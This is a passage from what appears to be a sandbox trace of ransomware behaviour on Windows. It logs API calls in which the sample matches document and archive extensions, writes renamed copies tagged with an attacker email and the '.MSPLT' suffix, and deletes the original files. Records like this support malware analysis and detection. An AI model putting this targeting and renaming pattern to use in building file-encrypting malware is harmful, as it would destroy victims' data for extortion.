(lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.964] lstrlenW (lpString=".doc") returned 4 [0287.964] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.964] lstrlenW (lpString=".docx") returned 5 [0287.964] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0287.964] lstrlenW (lpString=".pdf") returned 4 [0287.964] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.964] lstrlenW (lpString=".xls") returned 4 [0287.964] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.964] lstrlenW (lpString=".xlsx") returned 5 [0287.964] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0287.964] lstrlenW (lpString=".ppt") returned 4 [0287.964] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.964] lstrlenW (lpString=".zip") returned 4 [0287.964] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.964] lstrlenW (lpString=".rar") returned 4 [0287.964] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.964] lstrlenW (lpString=".bz2") returned 4 [0287.964] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.964] lstrlenW (lpString=".7z") returned 3 [0287.964] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.964] lstrlenW (lpString=".dbf") returned 4 [0287.964] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.965] lstrlenW (lpString=".1cd") returned 4 [0287.965] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.965] lstrlenW (lpString=".jpg") returned 4 [0287.965] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.965] lstrlenW (lpString=".doc") returned 4 [0287.965] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString=".docx") returned 5 [0287.965] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0287.965] lstrlenW (lpString=".pdf") returned 4 [0287.965] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString=".xls") returned 4 [0287.965] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString=".xlsx") returned 5 [0287.965] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0287.965] lstrlenW (lpString=".ppt") returned 4 [0287.965] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.965] lstrlenW (lpString=".zip") returned 4 [0287.965] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.965] lstrlenW (lpString=".rar") returned 4 [0287.965] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString=".bz2") returned 4 [0287.965] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.965] lstrlenW (lpString=".7z") returned 3 [0287.965] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.966] lstrlenW (lpString=".dbf") returned 4 [0287.966] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.966] lstrlenW (lpString=".1cd") returned 4 [0287.966] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0287.966] lstrlenW (lpString=".jpg") returned 4 [0287.966] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.966] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.966] lstrlenW (lpString="base_kor.xml") returned 12 [0287.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.967] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=488) returned 1 [0287.967] CloseHandle (hObject=0x420) returned 1 [0287.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0x20 [0287.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0287.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0287.968] lstrlenW (lpString=".doc") returned 4 [0287.968] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.968] lstrlenW (lpString=".docx") returned 5 [0287.968] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0287.968] lstrlenW (lpString=".pdf") returned 4 [0287.968] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.968] lstrlenW (lpString=".xls") returned 4 [0287.968] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.968] lstrlenW (lpString=".xlsx") returned 5 [0287.968] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0287.968] lstrlenW (lpString=".ppt") returned 4 [0287.968] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0287.968] lstrlenW (lpString=".zip") returned 4 [0287.968] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.968] lstrlenW (lpString=".rar") returned 4 [0287.968] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.968] lstrlenW (lpString=".bz2") returned 4 [0287.968] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.968] lstrlenW (lpString=".7z") returned 3 [0287.968] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0287.992] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0290.442] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=4390) returned 1 [0290.442] CloseHandle (hObject=0x44c) returned 1 [0290.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 0x220 [0290.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0x20 [0290.459] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.459] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0290.463] GetLastError () returned 0x0 [0290.463] ReadFile (in: hFile=0x460, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1ba0, lpOverlapped=0x0) returned 1 [0290.487] WriteFile (in: hFile=0x43c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1bb0, lpOverlapped=0x0) returned 1 [0290.489] ReadFile (in: hFile=0x460, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.489] WriteFile (in: hFile=0x43c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0290.489] SetEndOfFile (hFile=0x43c) returned 1 [0290.490] CloseHandle (hObject=0x43c) returned 1 [0290.492] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.492] SetEndOfFile (hFile=0x460) returned 1 [0290.694] CloseHandle (hObject=0x460) returned 1 [0290.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.982] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0292.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.128] lstrlenW (lpString=".doc") returned 4 [0292.129] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.129] lstrlenW (lpString=".docx") returned 5 [0292.129] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.129] lstrlenW (lpString=".pdf") returned 4 [0292.129] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.129] lstrlenW (lpString=".xls") returned 4 [0292.129] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.129] lstrlenW (lpString=".xlsx") returned 5 [0292.129] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.129] lstrlenW (lpString=".ppt") returned 4 [0292.129] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.129] lstrlenW (lpString=".zip") returned 4 [0292.129] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.129] lstrlenW (lpString=".rar") returned 4 [0292.129] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.129] lstrlenW (lpString=".bz2") returned 4 [0292.129] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.129] lstrlenW (lpString=".7z") returned 3 [0292.129] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.130] lstrlenW (lpString=".dbf") returned 4 [0292.130] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.130] lstrlenW (lpString=".1cd") returned 4 [0292.130] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.130] lstrlenW (lpString=".jpg") returned 4 [0292.130] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.130] lstrlenW (lpString=".doc") returned 4 [0292.131] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.131] lstrlenW (lpString=".docx") returned 5 [0292.131] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.131] lstrlenW (lpString=".pdf") returned 4 [0292.131] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.131] lstrlenW (lpString=".xls") returned 4 [0292.132] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.132] lstrlenW (lpString=".xlsx") returned 5 [0292.132] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.132] lstrlenW (lpString=".ppt") returned 4 [0292.132] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.132] lstrlenW (lpString=".zip") returned 4 [0292.132] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.132] lstrlenW (lpString=".rar") returned 4 [0292.132] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.132] lstrlenW (lpString=".bz2") returned 4 [0292.132] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.132] lstrlenW (lpString=".7z") returned 3 [0292.132] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.132] lstrlenW (lpString=".dbf") returned 4 [0292.132] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.132] lstrlenW (lpString=".1cd") returned 4 [0292.132] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0292.132] lstrlenW (lpString=".jpg") returned 4 [0292.132] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.133] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.133] lstrlenW (lpString="AN01060_.WMF") returned 12 [0292.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.296] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=7968) returned 1 [0292.296] CloseHandle (hObject=0x454) returned 1 [0292.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf")) returned 0x220 [0292.297] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.298] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.298] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0292.300] GetLastError () returned 0x0 [0292.300] ReadFile (in: hFile=0x454, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1f20, lpOverlapped=0x0) returned 1 [0292.302] WriteFile (in: hFile=0x3d0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1f30, lpOverlapped=0x0) returned 1 [0292.304] ReadFile (in: hFile=0x454, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.304] WriteFile (in: hFile=0x3d0, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.304] SetEndOfFile (hFile=0x3d0) returned 1 [0292.304] CloseHandle (hObject=0x3d0) returned 1 [0292.308] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.308] SetEndOfFile (hFile=0x454) returned 1 [0292.312] CloseHandle (hObject=0x454) returned 1 [0292.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0292.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.314] lstrlenW (lpString=".doc") returned 4 [0292.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.314] lstrlenW (lpString=".docx") returned 5 [0292.314] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.314] lstrlenW (lpString=".pdf") returned 4 [0292.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.314] lstrlenW (lpString=".xls") returned 4 [0292.314] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.314] lstrlenW (lpString=".xlsx") returned 5 [0292.314] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.314] lstrlenW (lpString=".ppt") returned 4 [0292.314] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.314] lstrlenW (lpString=".zip") returned 4 [0292.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.314] lstrlenW (lpString=".rar") returned 4 [0292.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString=".bz2") returned 4 [0292.315] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString=".7z") returned 3 [0292.315] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.315] lstrlenW (lpString=".dbf") returned 4 [0292.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.315] lstrlenW (lpString=".1cd") returned 4 [0292.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.315] lstrlenW (lpString=".jpg") returned 4 [0292.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.315] lstrlenW (lpString=".doc") returned 4 [0292.315] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString=".docx") returned 5 [0292.315] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.315] lstrlenW (lpString=".pdf") returned 4 [0292.315] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.315] lstrlenW (lpString=".xls") returned 4 [0292.315] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.315] lstrlenW (lpString=".xlsx") returned 5 [0292.315] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.315] lstrlenW (lpString=".ppt") returned 4 [0292.316] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.316] lstrlenW (lpString=".zip") returned 4 [0292.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.316] lstrlenW (lpString=".rar") returned 4 [0292.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.316] lstrlenW (lpString=".bz2") returned 4 [0292.316] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.316] lstrlenW (lpString=".7z") returned 3 [0292.316] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.316] lstrlenW (lpString=".dbf") returned 4 [0292.316] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.316] lstrlenW (lpString=".1cd") returned 4 [0292.316] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0292.316] lstrlenW (lpString=".jpg") returned 4 [0292.316] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.316] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.316] lstrlenW (lpString="AN01084_.WMF") returned 12 [0292.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.317] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1832) returned 1 [0292.317] CloseHandle (hObject=0x454) returned 1 [0292.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf")) returned 0x220 [0292.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.318] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.319] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.319] CreateFileW 